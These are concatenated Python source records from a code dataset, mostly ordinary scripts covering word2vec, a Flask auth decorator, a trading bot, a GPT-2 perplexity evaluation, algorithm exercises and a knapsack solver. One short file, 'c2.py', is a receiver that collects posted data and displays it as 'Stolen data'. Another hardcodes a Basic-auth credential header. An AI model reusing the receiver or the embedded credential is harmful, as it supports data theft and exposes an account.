'EMRG', 'TH', 'ASIA'],\n['JP', 'ELI', 'HDWR', 'TEL', 'US', 'CN', 'ELC', 'TW', 'RTRS', 'SG', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['JP', 'MAC', 'IN', 'RTRS', 'LEN', 'EMRG', 'ASIA', 'RESF', 'AUT'],\n['JP', 'MAC', 'IN', 'RTRS', 'LEN', 'EMRG', 'ASIA', 'RESF', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['XREF', 'RET', 'ELG', 'FIN', 'DIV', 'BNK', 'ENR', 'LEN', 'RTRS', 'EMRG', 'KR', 'HOT', 'ASIA', 'AUT'],\n['ENT', 'HDWR', 'DPR', 'US', 'STX', 'SFWR', 'REA', 'RTRS', 'PRESS', 'LEN', 'BY', 'WASH'],\n['JP', 'ELI', 'HDWR', 'TEL', 'US', 'CN', 'ELC', 'TW', 'RTRS', 'SG', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['ECI', 'CEN', 'REA', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'MCE', 'ASIA', 'STIR'],\n['BACT', 'BUS', 'US', 'NEWR', 'MNGISS', 'LEN'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['MUL', 'TEL', 'STX', 'HK', 'FIN', 'SHP', 'CN', 'GB', 'BNK', 'RTRS', 'LEN', 'ASIA'],\n['JP', 'HDWR', 'US', 'CN', 'ELC', 'TW', 'RTRS', 'LEN', 'EMRG', 'KR', 'ASIA'],\n['BACT', 'INS', 'US', 'WEU', 'NEWR', 'FIN', 'GB', 'LEN', 'EUROPE', 'EU'],\n['FR', 'WEU', 'RTRS', 'LEN', 'EUROPE'],\n['INT', 'LOA', 'CEN', 'PLCY', 'BLD', 'REA', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'MCE', 'ASIA', 'STIR'],\n['IT', 'WEU', 'STX', 'RTRS', 'LEN', 'EUROPE'],\n['IT', 'WEU', 'STX', 'RTRS', 'LEN', 'EUROPE'],\n['DE', 'US', 'CN', 'TRD', 'RTRS', 'LEN', 'EMRG', 'ASIA', 'AUT'],\n['JP', 'STL', 'FR', 'US', 'WEU', 'MRG', 'RTRS', 'LEN', 'EUROPE', 'MET', 'WHO'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['NL', 'WEU', 'STX', 'RTRS', 'LEN', 'BE', 'EUROPE', 'XREF'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'ASIA', 'AUT'],\n['WEU', 'STX', 'RTRS', 'LEN', 'EUROPE', 'FI', 'NORD'],\n['WEU', 'STX', 'RTRS', 'LEN', 'EUROPE', 'FI', 'NORD'],\n['WEU', 'STX', 'RTRS', 'LEN', 'EUROPE', 'FI', 'NORD'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'ASIA', 'AUT'],\n['CHE', 'MAC', 'DRV', 'WEU', 'ELG', 'STX', 'SHP', 'ELC', 'RTRS', 'LEN', 'EMRG', 'CON', 'KR', 'ASIA', 'AUT'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'NORD'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'NORD'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'XREF', 'NORD'],\n['PT', 'DE', 'NL', 'FR', 'CH', 'NEWS', 'WEU', 'IT', 'STX', 'GB', 'RTRS', 'LEN', 'ES', 'EUROPE', 'XREF', 'NORD'],\n['IT', 'WEU', 'STX', 'RTRS', 'LEN', 'EUROPE'],\n['PUB', 'DE', 'LATAM', 'REC', 'TEL', 'NEWR', 'WEU', 'IN', 'CN', 'TBCS', 'BR', 'WWW', 'LEN', 'EMRG', 'LEI', 'EUROPE', 'ASIA'],\n['WEU', 'GB', 'IE', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'GB', 'IE', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'ELG', 'GB', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'ELG', 'GB', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'MRG', 'GB', 'LEN', 'EUROPE', 'REG'],\n['WEU', 'FIN', 'GB', 'LEN', 'EUROPE', 'REG']]\n\ndef test1():\n model = word2vec.Word2Vec(data, size=5,window=2,min_count=1)\n k=model.most_similar(positive=u'EMRG')\n\n # print(\"rest:\",k)\n print(model.wv['WEU', 'MRG', 'GB', 'LEN', 'EUROPE', 'REG'])\n print(model.wv['WEU'])\ndef train(data):\n model = word2vec.Word2Vec(size=5,min_count=1)\n model.build_vocab(data)\n model.train(data, total_examples=len(data),epochs=200)\n model.save(\"word2vec/word2vec.model\")\n # print(model.wv['WEU'])\n# print(len(data))\ndef predict(str):\n model = word2vec.Word2Vec.load(\"word2vec/word2vec.model\")\n print(model.wv[str])\n# train(data)\npredict('WEU')","sub_path":"000.TwoSigma/test/word2vec_test.py","file_name":"word2vec_test.py","file_ext":"py","file_size_in_byte":8739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"368131718","text":"import datefinder\nimport winsound\nimport datetime\n\ndef alarm(text):\n\tDate_Time_Alarm=datefinder.find_dates(text)\n\tfor match in Date_Time_Alarm:\n\t\tprint(match)\n\tStringAlarm=str(match)\n\tTimeAlarm=StringAlarm[11:]\n\tprint(TimeAlarm)\n\tHourAlarm=int(TimeAlarm[:-6])\n\tMinAlarm=int(TimeAlarm[3:-3])\n\n\twhile True:\n\t\tif HourAlarm==datetime.datetime.now().hour:\n\t\t\tif MinAlarm==datetime.datetime.now().minute:\n\t\t\t\tprint(\"Alarm is running\")\n\t\t\t\twinsound.PlaySound(\"C:\\\\Users\\\\ruhel\\\\Downloads\\\\Never Gonna Give You Up Original.mp3\",winsound.SND_LOOP)\n\t\t\telif MinAlarm\" + str(request.data)\n return jsonify(success=True)\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n global data\n return \"

Stolen data:

\" + data\n\nif __name__ == '__main__':\n app.run()\n\n","sub_path":"c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"454797153","text":"from functools import wraps\nfrom inspect import signature\nimport datetime\nimport logging\n\nfrom flask import g, session\nfrom research_auth.flask_ext import FlaskOpenIdClient\n\nimport markerfarmapi.config as cfg\nfrom markerfarmapi import database_utility as db_util\nfrom markerfarmapi.models.UserRole import UserRole\nfrom markerfarmapi.utility import create_json_response\nfrom markerfarmapi.markerfarm.external import azuread_service, oidc_service\n\nSUCCESS = 'Success'\nERROR = 'Error'\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef authorize(*roles, require_identity=False):\n def wrapper(f):\n @wraps(f)\n def wrapped(*args, **kwargs):\n username = None\n user_role = None\n oid = None\n\n user_session = session.get('user')\n if user_session:\n username = user_session['username']\n user_role = user_session['role']\n oid = user_session['oid']\n else:\n access_token = oidc_service.get_access_token_from_request()\n if access_token:\n client_id = cfg.research_auth['client_id']\n jwt_data = oidc_service.get_jwt_token_claims(access_token, audience=client_id)\n logger.debug(\"jwt_claims: %s\", jwt_data.claims)\n if jwt_data.exception or not jwt_data.valid:\n return create_json_response(\"Error\", f'Access denied: access token invalid: {jwt_data.exception}', 401)\n\n oid = jwt_data.claims.get(\"oid\")\n if not oid:\n return create_json_response(\"Error\", \"Access denied: access token does not contain 'oid' field\", 401)\n\n try:\n user = get_user_by_oid(oid)\n if user:\n username = user.user_name\n user_role = user.role.value\n else:\n username = azuread_service.get_username_for_current_user(access_token)\n user = get_user_by_username(username)\n if user:\n user_role = user.role.value\n user.oid = oid\n db_util.db_commit()\n\n except Exception as e:\n logger.warn(\"Could not establish username or role: %s\", e)\n\n if(all([username, user_role, oid])):\n session['user'] = dict(\n username=username,\n role=user_role,\n oid=oid\n )\n\n if not (oid):\n return create_json_response(\"Error\", 'Access denied: no valid credentials given', 401)\n if not username:\n return create_json_response(\"Error\", f\"Access denied: Could not establish identity for '{oid}'\", 403)\n if user_role not in roles:\n return create_json_response(\"Error\", f\"Access denied: Caller identity '{username}' is not authorized to call this endpoint\", 403)\n\n g.user = dict(username=username, user_role=user_role, oid=oid)\n if \"username\" in signature(f).parameters:\n kwargs['username'] = username\n if \"user_role\" in signature(f).parameters:\n kwargs['user_role'] = user_role\n\n return f(*args, **kwargs)\n\n return wrapped\n\n return wrapper\n\ndef get_user_by_oid(oid):\n try:\n user = UserRole.query.filter(UserRole.oid==oid).one_or_none()\n return user\n except Exception as e:\n logger.error(\"Could not get user by oid: %s\", e)\n raise\n\ndef get_user_by_username(user_name):\n \"\"\"\n Gets SnpFinder user\n \"\"\"\n try:\n user = UserRole.query.get(user_name)\n except Exception as e:\n raise Exception('Failed to get user with error: ', e)\n\n return user if user else None\n\ndef get_current_user_email():\n access_token = oidc_service.get_access_token_from_request()\n profile = azuread_service.get_user_profile(access_token)\n return profile.get('mail')\n\ndef add_user(userdata):\n \"\"\"\n Adds new user for SnpFinder Application\n \"\"\"\n try:\n result = {}\n user_name = userdata['username']\n role = userdata.get('role', '').lower()\n oid = userdata.get('oid')\n if role == \"user\":\n active = is_active(userdata['active'])\n user_role = UserRole(user_name, role, active, oid)\n db_util.db.session.add(user_role)\n db_util.db.session.commit()\n result['status'] = 'Success: user-data inserted successfully!'\n else:\n result['status'] = 'Error: Invalid role provided'\n\n except Exception as e:\n err_type = e.__class__.__name__\n if err_type == 'IntegrityError':\n raise Exception('Failed to add user as it is already authorized with error: ', e)\n\n raise Exception('Failed to add user with error: ', e)\n\n return result\n\n\ndef set_user_status(usr_name, userdata):\n \"\"\"\n Toggles user status between 'y' and 'n'\n \"\"\"\n try:\n result = {}\n user = UserRole.query.get(usr_name)\n if not user:\n raise Exception(\"user \" + usr_name + \" does not exist\")\n if 'active' in userdata and userdata['active']:\n active_value = is_active(userdata['active'])\n user.active = active_value\n if active_value:\n result['status'] = 'User ' + usr_name + ' is activated'\n else:\n result['status'] = 'User ' + usr_name + ' is deactivated'\n # updating user role\n user.role = userdata.get('role', user.role)\n db_util.db_commit()\n result['role'] = user.role\n\n except Exception as e:\n raise Exception('Failed to set user status with error: ', e)\n\n return result\n\n\ndef set_user_role(usr_name, userdata):\n \"\"\"\n Set user role\n \"\"\"\n try:\n result = {}\n role = None\n user = UserRole.query.get(usr_name)\n if not user:\n raise Exception(\"user \" + usr_name + \" does not exist\")\n if 'role' in userdata and userdata['role']:\n user.role = userdata.get('role', user.role)\n role = user.role\n\n db_util.db_commit()\n result['username'] = usr_name\n result['role'] = role\n\n except Exception as e:\n raise Exception('Failed to set user role with error: ', e)\n\n return result\n\n\ndef is_active(active):\n active_values = ['y', 'yes', 'true']\n if active.lower() in active_values:\n return True\n else:\n return False\n","sub_path":"markerfarmapi/markerfarm/user_service.py","file_name":"user_service.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519720561","text":"import time, requests\nfrom classes import donchian\nfrom prettytable import PrettyTable\n\nTICK_INTERVAL = 300 # seconds\n\n\ndef main():\n print('Starting bot...')\n\n while True:\n start = time.time()\n tick()\n end = time.time()\n\n if end - start < TICK_INTERVAL:\n time.sleep(TICK_INTERVAL - (end - start))\n\n\ndef tick():\n print('Running routine')\n ticktable = PrettyTable()\n ticktable.clear()\n ticktable.field_names = ['-----', \"5 minutes\", \"30 minutes\", \"Hour\"]\n market_summaries = simple_request('https://bittrex.com/api/v1.1/public/getmarketsummaries')\n string = 'BTC'\n for summary in market_summaries['result']:\n if string in summary['MarketName'] and summary['BaseVolume'] >= 80:\n market = summary['MarketName']\n try:\n agent5m = donchian.Donchian(market, 'fiveMin')\n agent30m = donchian.Donchian(market, 'thirtyMin')\n agent1h = donchian.Donchian(market, 'hour')\n longmaterial5m = agent5m.is_long_material()\n longmaterial30m = agent30m.is_long_material()\n longmaterial1h = agent1h.is_long_material()\n position5m = agent5m.define_position(agent5m.trim_data(1))\n position30m = agent30m.define_position(agent30m.trim_data(1))\n position1h = agent1h.define_position(agent1h.trim_data(1))\n limarketsep = [market, '****', '****', '****']\n liposition = ['Price Position', position5m, position30m, position1h]\n limaterial = ['Long Material', longmaterial5m, longmaterial30m, longmaterial1h]\n ticktable.add_row(limarketsep)\n ticktable.add_row(liposition)\n ticktable.add_row(limaterial)\n print(market + ' has been processed')\n except TypeError:\n print('TypeError while proccesing market ' + market)\n pass\n print(ticktable)\n print('End of routine, lets sleep')\n\n\ndef simple_request(url):\n r = requests.get(url)\n return r.json()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tablegenerators/multimarketmultiinterval.py","file_name":"multimarketmultiinterval.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22436496","text":"# -*- coding: utf-8 -*-\n# Copyright 2019 Ross Jacobs All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities that codegen uses.\"\"\"\nimport datetime\nimport distutils.version\nimport http.client\nimport json\nimport logging\nimport re\n\nimport codegen\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass GithubIssues:\n \"\"\"Interface with Github Issues for mad-codegen project.\"\"\"\n def __init__(self):\n self.headers = {\n 'Authorization': 'Basic cG9jYzo5Nzg5ODkwYmU4YThiYzZiZDc4'\n 'MDcwMmY4NGEwNmZlNzExZGJjY2Yw',\n 'User-Agent': 'Merakygen'\n }\n\n def get_issues(self):\n \"\"\"Get the issues for this project.\"\"\"\n conn = http.client.HTTPSConnection('api.github.com')\n conn.request('GET', '/repos/pocc/mad-codegen/issues',\n headers=self.headers)\n resp = conn.getresponse()\n issues_text = resp.read().decode('utf-8')\n\n return issues_text\n\n def check_issue(self, api_primitive):\n \"\"\"Check whether a new API primitive has an issue assigned.\n\n Args:\n api_primitive (str): A Meraki API path parameter\n Returns (bool):\n Whether there is a new path parameter that requires an issue\n \"\"\"\n issues_json = json.loads(self.get_issues())\n existing_issue_titles = [issue['title'] for issue in issues_json]\n new_issue_required = api_primitive not in existing_issue_titles \\\n and self.is_up_to_date()\n if new_issue_required:\n print(\"INFO: API primitive not found. \"\n \"This means new API endpoints have been released.\"\n \"\\nPlease create an issue:\"\n \"\\n\\n\\thttps://github.com/pocc/mad-codegen/issues\"\n \"\\n\\tTitle\\tNew API primitive found: `\" + api_primitive + \"`\"\n \"\\n\\tBody\\tFound at \" + str(datetime.datetime.utcnow()))\n\n return new_issue_required\n\n def is_up_to_date(self):\n \"\"\"Check whether this program is out of date with github's.\n\n Returns (bool):\n Whether this program is out of date with masters' version.\n \"\"\"\n base_url = 'raw.githubusercontent.com'\n route = '/pocc/mad-codegen/master/mad-codegen/__init__.py'\n conn = http.client.HTTPSConnection(base_url)\n conn.request('GET', route, headers=self.headers)\n resp = conn.getresponse()\n init_text = resp.read().decode('utf-8')\n web_version = re.search(r'__version__ ?= ?\\'([0-9.]*)\\'', init_text)[1]\n\n up_to_date = distutils.version.StrictVersion(codegen.__version__) \\\n >= distutils.version.StrictVersion(web_version)\n\n return up_to_date\n\n\ndef log_ext_program_output(program_name, program_output):\n \"\"\"Other programs return log text via Popen. Format that and log it.\n\n Log it as debug as it is verbose and mostly not relevant to operation.\n\n Args:\n program_output (str): Output of another program\n program_name (str): Name of the program being called\n \"\"\"\n if 'ERROR' in program_output:\n err_line = re.search(r'\\n(.*?ERROR.*?)\\n', program_output).group(1)\n raise RuntimeError(program_name + ' produced error: ' + str(err_line))\n\n output_line_start = '\\n\\t> [' + program_name + '] > '\n program_output = program_output.replace('\\n\\n', '\\n')\n formatted_text = re.sub(r'\\n([\\S ])', output_line_start + '\\\\1',\n program_output)\n LOGGER.debug('`' + program_name + '` STDOUT >' +\n output_line_start + formatted_text)\n","sub_path":"codegen/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263435375","text":"#!/usr/bin/env python\n# coding=utf-8\n# Copyright 2020 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\n\nimport torch\nfrom tqdm import tqdm\nfrom datasets import load_dataset\nfrom transformers import GPT2LMHeadModel, GPT2TokenizerFast\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_name_or_path', type=str, default='gpt2',\n help='The model checkpoint for weights initialization.')\n\ndef main():\n args = parser.parse_args()\n \n device = 'cuda'\n model_id = args.model_name_or_path\n\n model = GPT2LMHeadModel.from_pretrained(model_id).to(device)\n tokenizer = GPT2TokenizerFast.from_pretrained(model_id)\n\n dataset = load_dataset('ptb_text_only')\n texts = [el['sentence'] for el in dataset['test']]\n encodings = tokenizer('\\n\\n'.join(texts), return_tensors='pt')\n\n max_length = model.config.n_positions\n stride = 1024\n\n lls = []\n for i in tqdm(range(0, encodings.input_ids.size(1), stride)):\n begin_loc = max(i + stride - max_length, 0)\n end_loc = min(i + stride, encodings.input_ids.size(1))\n trg_len = end_loc - i # may be different from stride on last loop\n input_ids = encodings.input_ids[:,begin_loc:end_loc].to(device)\n target_ids = input_ids.clone()\n target_ids[:,:-trg_len] = -100\n\n with torch.no_grad():\n outputs = model(input_ids, labels=target_ids)\n log_likelihood = outputs[0] * trg_len\n\n lls.append(log_likelihood)\n\n ppl = torch.exp(torch.stack(lls).sum() / end_loc)\n\n print(\"Perplexity:\", ppl)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"eval_gpt2.py","file_name":"eval_gpt2.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"35225050","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom closest_pair import closest_pair, brute_force_closest_pair\n\nclass TestClosestPair(unittest.TestCase):\n def test_brute_force_closest_pair(self):\n closest_pairs = [(1, 1), (1, 2)]\n points = closest_pairs + [(3, 0), (4, 9)]\n result = brute_force_closest_pair(points)\n self.assertEqual(result, tuple(closest_pairs))\n\n def test_closest_pair(self):\n closest_pairs = [(1, 1), (1, 2)]\n points = closest_pairs + [(3, 0), (4, 9)]\n result = closest_pair(points)\n self.assertEqual(result, tuple(closest_pairs))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"closest_pair/test_closest_pair.py","file_name":"test_closest_pair.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403475745","text":"def main():\n x = 0\n student_marks = []\n student_names = []\n print(name_message())\n total_grades = int(input(\"How many grades would you like to enter?: \"))\n while x < total_grades:\n student_marks.append(take_interger())\n student_names.append(take_name())\n x += 1\n print(f\"The class average is % {average(student_marks)}\")\n name_list(student_names, student_marks)\n print(failing_grades(student_marks)) \n\n\ndef take_name():\n while True:\n name = input(\"What's their name?: \")\n if 2 <= len(name) <= 15:\n return name\n else:\n print(\"Invalid input please try again\")\n\n\ndef name_message():\n name = input(\"What's your name?: \")\n return (f\"Hello {name}. Welcome to the Markbook Program.\")\n\n\ndef take_interger():\n number = 0\n while True:\n try:\n number = int(input(\"Input an interger: \"))\n except ValueError:\n print(\"Invalid input please try again.\")\n if number >= 0:\n return number\n elif number < 0:\n print(\"Invalid input please try again\")\n\n\ndef name_list(student_names, student_marks):\n for name, mark in zip(student_names, student_marks):\n print(name, mark)\n\n\ndef failing_grades(student_marks):\n fails = 0\n for mark in student_marks:\n if mark <= 50:\n fails += 1\n return (f\"{fails} student(s) are failing\")\n\ndef average(student_marks):\n y = 0\n for i in student_marks:\n y += i\n return round(y / len(student_marks),2)\n\nmain()\n","sub_path":"testredo_withtry&except.py","file_name":"testredo_withtry&except.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91857562","text":"class ArrayQuestions():\n\n # Problem : Remove Duplicates from Sorted Array\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def remove_duplicates(self, nums):\n if (len(nums) < 2):\n return len(nums)\n\n i = 0\n for j in range(1, len(nums)):\n if (nums[i] < nums[j]):\n temp = nums[j]\n nums[j] = nums[i + 1]\n nums[i + 1] = temp\n i += 1\n return i + 1\n\n # Problem : Best Time to Buy and Sell Stock II\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def max_profit(self, prices):\n if (len(prices) < 2):\n return 0\n\n profit = []\n profit.append(0)\n\n for i in range(1, len(prices)):\n if prices[i] <= prices[i - 1]:\n profit.append(profit[i - 1])\n else:\n profit.append(profit[i - 1] + (prices[i] - prices[i - 1]))\n return profit[-1]\n\n # Problem : Rotate Array\n # Time Complexity : O(n)\n # Space Complexity : O(n)\n def rotate_array(self, nums, k):\n k = k % len(nums)\n\n l = []\n i = -k\n while (i < len(nums) - k):\n l.append(nums[i])\n i += 1\n\n for i in range(0, len(nums)):\n nums[i] = l[i]\n\n # Problem : Contains Duplicate\n # Time Complexity : O(n)\n # Space Complexity : O(n)\n def contains_duplicate(self, nums):\n s = set()\n for i in nums:\n if i in s:\n return True\n else:\n s.add(i)\n return False\n\n # Problem : Single Number\n # Time Complexity : O(n)\n # Space Complexity : O(n)\n def single_number_set(self, nums):\n num_set = set()\n for i in nums:\n if i in num_set:\n num_set.remove(i)\n else:\n num_set.add(i)\n return num_set.pop()\n\n # Problem : Single Number\n # Time Complexity : O(n log n)\n # Space Complexity : O(1)\n def single_number_sort(self, nums):\n nums.sort()\n for i in range(0, len(nums), 2):\n if (i + 1 == len(nums)) or (nums[i] != nums[i + 1]):\n return nums[i]\n\n # Problem : Single Number\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def single_number_bit(self, nums):\n xor = 0\n for i in nums:\n xor = xor ^ i\n return xor\n\n # Problem : Move Zeroes (283)\n # * In-place\n # * Minimize total number of operations\n # Time Complexity : O(n^2)\n # Space Complexity : O(1)\n def move_zeroes_brute_force(self, nums):\n i = 0\n j = 1\n while (i < len(nums) and j < len(nums)):\n if (nums[i] == 0) and (nums[j] != 0):\n temp = nums[i]\n nums[i] = nums[j]\n nums[j] = temp\n i += 1\n j = i + 1\n elif (nums[i] == 0) and (nums[j] == 0):\n j += 1\n else:\n i += 1\n j += 1\n\n # Problem : Move Zeroes (283)\n # * In-place\n # * Minimize total number of operations\n # Time Complexity : O(n)\n # Space Complexity : O(1)\n def move_zeroes(self, nums):\n zero_index = 0\n for i in nums:\n if (i != 0):\n nums[zero_index] = i\n zero_index += 1\n for i in range(zero_index, len(nums)):\n nums[i] = 0","sub_path":"questions/leetcode/easy/array_questions.py","file_name":"array_questions.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"424845839","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom collections import namedtuple\nItem = namedtuple(\"Item\", ['index', 'value', 'weight'])\n\ndef solve_it(input_data):\n # Modify this code to run your optimization algorithm\n\n # parse the input\n lines = input_data.split('\\n')\n\n firstLine = lines[0].split()\n item_count = int(firstLine[0])\n capacity = int(firstLine[1])\n\n items = []\n\n for i in range(1, item_count+1):\n line = lines[i]\n parts = line.split()\n items.append(Item(i-1, int(parts[0]), int(parts[1])))\n\n # show the capaicty and number of items\n print('\\n')\n print('Capacity:', str(capacity))\n print('Number of Items:', str(item_count))\n\n if capacity * item_count > 5000000000:\n # a trivial greedy algorithm for filling the knapsack\n # it takes items in-order until the knapsack is full\n print('Using greedy algorithm...')\n value = 0\n weight = 0\n taken = [0] * item_count\n\n for item in items:\n if weight + item.weight <= capacity:\n taken[item.index] = 1\n value += item.value\n weight += item.weight\n\n # prepare the solution in the specified output format\n output_data = str(value) + ' ' + str(0) + '\\n'\n output_data += ' '.join(map(str, taken))\n return output_data\n\n # a dynamic programming algorithm for filling the knapsack\n # use PyTables to store large matrix\n print('Using dynamic programming...')\n import tables as tb\n import numpy as np\n store = 'store.h5'\n filters = tb.Filters(complevel=5, complib='blosc') # use BLOSC compression\n hdf5_file = tb.open_file(store, mode='w')\n dp_table = hdf5_file.create_carray(hdf5_file.root, 'data',\n tb.Int32Atom(),\n shape=(capacity+1, item_count+1),\n filters=filters)\n\n # initialize the first column\n prev = dp_table[:, 0] = np.zeros(capacity+1)\n cur = np.empty(capacity+1)\n\n # fill the table\n for i in range(1, item_count+1):\n # when the weight of the item is greater than the capacity\n if items[i-1].weight > capacity:\n cur = prev\n # when the weight of the item is less than or equal to the capacity\n else:\n # the remain capacity cannot satisfy the item\n cur[:items[i-1].weight] = prev[:items[i-1].weight]\n # the remain capacity can satisfy the item\n cur[items[i-1].weight:] = np.maximum(prev[items[i-1].weight:], \\\n items[i-1].value+prev[:-items[i-1].weight])\n dp_table[:, i] = cur\n prev = cur\n\n # show the remaining items\n if item_count - i and (item_count - i) % 100 == 0:\n print('{} items remain...'.format(item_count-i))\n\n # close the file\n hdf5_file.close()\n\n # read the file\n read_hdf5_file = tb.open_file(store, mode='r')\n dp_table = read_hdf5_file.root.data\n\n # get the opitimal value\n value = int(dp_table[-1, -1])\n\n # initialize the taken list\n taken = [0] * item_count\n\n # trace back\n remain_weight = capacity\n for i in range(1, item_count+1):\n # when the weight between previous and current is different, the item should be taken\n if dp_table[remain_weight, -i] != dp_table[remain_weight, -i-1]:\n taken[-i] = 1\n remain_weight -= items[-i].weight\n\n # close the file\n read_hdf5_file.close()\n\n # prepare the solution in the specified output format\n output_data = str(value) + ' ' + str(0) + '\\n'\n output_data += ' '.join(map(str, taken))\n return output_data\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) > 1:\n file_location = sys.argv[1].strip()\n with open(file_location, 'r') as input_data_file:\n input_data = input_data_file.read()\n print(solve_it(input_data))\n else:\n print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/ks_4_0)')\n","sub_path":"01Knapsack/old_solver/solver_PyTable.py","file_name":"solver_PyTable.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190609624","text":"import sys,pygame,random\nfrom fff2.bullet import Bullet\nfrom fff2.enemybullet import Ebullet\n\ndef update_screen(bullets,screen,ship,enemy,enemybullets):\n background = pygame.image.load(\"../Resources/bg_01.png\").convert()\n screen.blit(background, (0, 0))\n for b1 in bullets.sprites():\n b1.draw_bullet()\n for b2 in enemybullets.sprites():\n b2.draw()\n ship.blitme()\n ship.move()\n enemy.blitme()\n enemy.move()\n bullets.update()\n enemybullets.update()\n pygame.display.flip()\n\ndef enebullet(screen,enemy,enemybullets):\n i = random.randint(1,30)\n if i==5:\n new_enemybullet = Ebullet(screen,enemy)\n enemybullets.add(new_enemybullet)\n\n\ndef 